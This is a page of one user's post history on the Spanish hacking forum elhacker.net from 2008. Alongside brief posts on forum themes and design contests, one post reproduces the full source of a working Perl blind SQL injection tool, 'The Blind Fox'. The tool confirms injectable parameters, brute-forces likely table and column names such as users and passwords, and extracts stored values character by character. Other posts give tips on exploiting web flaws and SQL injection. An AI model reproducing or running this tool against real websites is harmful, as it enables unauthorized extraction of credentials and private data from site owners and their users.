elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10
31  Media / Diseño Gráfico / Re: Portada ~ presentación en: 18 Octubre 2008, 18:22 pm
O podes agregarle el link con unas letras transparentes que ocupen masomenos el boton de "entrar" ?
32  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Elige el diseño (tema) en el foro en: 18 Octubre 2008, 18:04 pm
El de "Elhacker.net 2.0" me encanto, creo que voy a usar este ^^
33  Programación / Scripting / Scripters Needed. en: 18 Octubre 2008, 09:29 am
Se buscan scripters en Autoit para proyecto open source, mas dudas mandenme un PM o posteen aca :xD
Tambien se buscan Batch Coders.
34  Programación / Scripting / Re: The Blind Fox v0.5 | By Login-Root en: 18 Octubre 2008, 09:26 am
Código
  1. #!/usr/bin/perl
  2.  
  3. ###########################################################################################
  4. #                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
  5. ###########################################################################################
  6.  
  7. ###########################################################################################
  8. # [+] inf0:                                                                             ###
  9. ###########################################################################################
  10. # Busca:                                                                                ###
  11. # ======                                                                                ###
  12. #  - Checkeo AND 1=1 && AND 1=0                                                         ###        
  13. #  - Information_Schema && MySQL.User                                                   ###
  14. #  - Tablas                                                                             ###                                                
  15. #  - Columnas                                                                           ###
  16. #  - Extrae valores de las tablas (Opcional)                                            ###
  17. #                                                                                       ###
  18. #  ...y guarda todo en un archivo de texto.                                             ###
  19. #                                                                                       ###
  20. ###########################################################################################
  21.  
  22. ###########################################################################################
  23. # [+] Use:                                                                              ###
  24. ###########################################################################################
  25. # perl blindfox.pl [WEBSITE] [PATRON] [FILE] [-EXT]                                     ###
  26. #   [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)            ###
  27. #   [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0                ###
  28. #   [FILE]:    Archivo donde guardar informe                                            ###
  29. #   [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)              ###
  30. ###########################################################################################
  31.  
  32. ###########################################################################################
  33. # [+] c0ntact:                                                                          ###
  34. ###########################################################################################
  35. # MSN:    no.more@passport.com                                                          ###
  36. # Jabber: login-root@x23.eu                                                             ### 
  37. # E-Mail: login_root@yahoo.com.ar                                                       ###
  38. ###########################################################################################
  39.  
  40. ###########################################################################################
  41. # [+] sh0utz:                                                                           ###
  42. ###########################################################################################
  43. # In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
  44. # Many thanks to boER, who teach me a little of perl ;D                                 ###
  45. # VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.SPAM(75)                    ###
  46. ###########################################################################################
  47.  
  48. use LWP::Simple;
  49.  
  50. if(!$ARGV[2])
  51. 	{
  52. 		 print "\n\n-[+]- The Blind Fox v0.5 | By Login-Root -[+]-\n==============================================";
  53. 		 print "\n\nUso: perl $0 [WEBSITE] [PATRON] [FILE] [-EXT]\n";
  54. 		 print "\n[WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)\n[PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0\n[FILE]:    Archivo donde guardar informe\n[-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)\n\n";
  55. 		 exit (0);
  56. 	}
  57.  
  58. sub end()
  59. {
  60. 	print WEB "\n\n\n[*EOF*]";
  61.     print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n\n";
  62.     print "## c0ded by Login-Root | 2008 ##\n\n";
  63.     exit (0);  
  64. }    
  65.  
  66.  
  67. @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  68. 	  'name','names','nombre','nombres','member','members','admin_table',
  69. 	  'miembro','miembros','membername','admins','administrator','sign',
  70. 	  'administrators','passwd','password','passwords','pass','Pass',
  71. 	  'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
  72. 	  'member_password','mods','mod','moderators','moderator','user_email',
  73. 	  'user_emails','user_mail','user_mails','mail','emails','email','address',
  74. 	  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  75. 	  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  76. 	  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
  77. 	  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  78. 	  'sistema_usuario','sistema_password','contraseña','auth','key','senha','signin',
  79. 	  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
  80.       'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
  81.       'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
  82.       'associated','accnt','customers','customer','membres','administrateur','utilisateur',
  83.       'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
  84.       'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
  85. 	  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  86.  
  87. @nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  88.           'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  89.           'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
  90.           'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  91.           'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  92.           'user_pwd','u_pass','clave','usuario','contraseña','pas','sistema_password','autor','upassword','web_password','web_username');
  93.  
  94. if ( $ARGV[0]   !~   /^http:/ ) 
  95.   {
  96.       $ARGV[0] = "http://" . $ARGV[0];
  97.   }
  98.  
  99. open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n";
  100. print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
  101. print "\n[!] Chequeando por el patron...\n";
  102.       $sql=$ARGV[0]." AND 1=1";
  103.       $response=get($sql);
  104.       if($response =~ /$ARGV[1]/)
  105.         {
  106.             print "\n[+] Patron encontrado con AND 1=1\n";
  107.             print WEB "$sql => OK !\n";
  108.             $sql=$ARGV[0]." AND 1=0";
  109.             $response=get($sql);
  110.             if($response =~ /$ARGV[1]/)
  111.             {
  112.             	print "[-] Patron encontrado tambien con AND 1=0, posiblemente no vulnerable a Blind SQL Inyection, probar con otro patron\n";
  113.             	exit (0);
  114.             }
  115.             else
  116.             {
  117.             	print "[+] Patron no encontrado con AND 1=0, website vulnerable a Blind SQL Inyection\n";
  118.             	print WEB "$sql => OK !\n";
  119.             }
  120.          }
  121.          else
  122.          		{
  123.          			print "[-] Patron no encontrado, probar con otro\n";
  124.          			exit (0);
  125.          		}
  126.         print "\n[!] Chequeando si existe Information_Schema...";
  127.         $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
  128.         $response=get($sql);
  129.          if($response =~ /$ARGV[1]/)
  130.          	{
  131.          		print "\n[+] Information_Schema disponible...guardando en $ARGV[2]";
  132.                 print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
  133.  
  134.          	}
  135.          else
  136.          	{
  137.             	print "\n[-] Information_Schema no disponible";
  138.          	}
  139.         print "\n[!] Chequeando si existe MySQL.User...";
  140.         $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
  141.         $response=get($sql);
  142.          if($response =~ /$ARGV[1]/)
  143.          	{
  144.          		print "\n[+] MySQL.User disponible...guardando en $ARGV[2]";
  145.                 print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
  146.  
  147.          	}
  148.          else
  149.          	{
  150.             	print "\n[-] MySQL.User no disponible";
  151.          	}
  152.         print "\n\n[!] Bruteando tablas...";
  153.         print WEB "\n\n[TABLAS]:\n\n";
  154.         foreach $tabla(@nombretabla)
  155.          {
  156.                   chomp($tabla);
  157.                   $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
  158.                   $response=get($sql);
  159.                   if($response =~ /$ARGV[1]/)
  160.                     {
  161.                         print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
  162.                         print WEB "$sql\n";
  163.                     }
  164.                 }
  165.         print "\n\n[!] Tabla a la cual brutear columnas: ";
  166.             $tabla.=<STDIN>;
  167.             chomp($tabla);
  168.             print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
  169.             foreach $columna(@nombrecolumna)
  170.             {
  171.              chomp($columna);
  172.              $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
  173.              $response=get($sql);
  174.              if ($response =~ /$ARGV[1]/)
  175.                   {
  176.                       print "[+] La columna $columna esta disponible...guardando en $ARGV[2]\n";
  177.                       print WEB "$sql\n";
  178.                   }
  179.             }
  180.          if ($ARGV[3] =~ /-EXT/)
  181.          {
  182.          	extrac:
  183.          	$columna = '';
  184.          	print "\n[!] Columna de la tabla $tabla a la cual extraer campos: ";
  185.          	$columna.=<STDIN>;
  186.             chomp($columna);
  187.          	print "[!] Extrayendo valores de la tabla $tabla y columna $columna (puede demorar mucho tiempo)...\n\n";
  188.          	print WEB "\n\n[Valores de la tabla $tabla y columna $columna]:\n\n";
  189.          	$search = 1;
  190.          	$posicion = 1;
  191.          	$limit = 0;
  192.          	$comprob = 1;
  193.          	while ($search <= 255)
  194.          	{
  195.          		$sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna. " FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
  196.          		$response=get($sql);
  197.          		if ($response =~ /$ARGV[1]/)
  198.                   {
  199.                   	  $char = chr($search);
  200.                   	  print WEB "$char";
  201.                   	  print "$char";
  202.                       $search = 0;
  203.                       $posicion++;
  204.                       $comprob++;
  205.                   }
  206.                  if ($search == 255)
  207.                  {
  208.                  	print "\n";
  209.                  	print WEB "\n";
  210.                  	if ($comprob == 1)
  211.                  	{
  212.                  		$eleccion = '';
  213.                  		print "[+] Busqueda finalizada. Desea extraer valores de otra columna? [Y/N]: ";
  214.                  		$eleccion.=<STDIN>;
  215.                  		chomp($eleccion);
  216.                  		if ($eleccion =~ /Y/)
  217.                  		{
  218.                  			goto extrac;
  219.                  		}
  220.                  		else
  221.                  		{
  222.                  		   end();
  223.                  		}
  224.                  	}
  225.                  	$comprob = 1;
  226.                  	$search = 0;
  227.                     $limit++;
  228.                  }
  229.          		$search++;
  230.             }
  231.            }
  232. end();

Se entiende mas.
35  Programación / Scripting / Re: The Blind Fox v0.5 | By Login-Root en: 18 Octubre 2008, 09:22 am
Login, cierto que te elimine :xD podes arreglar cuando por ejemplo pones http://www.site.com/index.php?user=guest&variable=1
Para que el script no te tome el "&" como una linea de comandos, se puede hacer?
36  Media / Diseño Gráfico / Re: [Battle Art] ++The Art Modding++ (Votacion) en: 18 Octubre 2008, 05:55 am
JAJJAA Me di cuenta tarde del tema, crei que todavia se podia votar :xD
37  Media / Diseño Gráfico / Re: [BattleArt] Retoque digital (Votacion) en: 18 Octubre 2008, 05:52 am
Azielito rlz, 4 evah. :)
38  Seguridad Informática / Nivel Web / Re: ¿Cómo explotar esta vulnerabilidad? en: 18 Octubre 2008, 01:03 am
No creo que tenga permisos para usar system or passthru, pero nunca hace mal probar.
39  Seguridad Informática / Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!! en: 16 Octubre 2008, 11:51 am
Si tenes alguna otra duda, googleala que google tiene la respuesta a todo imagina cuanta gente hizo tu misma pregunta.
40  Seguridad Informática / Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!! en: 16 Octubre 2008, 00:26 am
No hay ninguna manera de saltarse las magic quotes y estas solo pueden ser desactivadas modificando el archivo de configuración de PHP (php.ini). No hay manera de darse cuenta si tan activadas o no.
Recomiendo que uses un fuzzer, como.... sqlbind
Salutes.
Páginas: 1 2 3 [4] 5 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines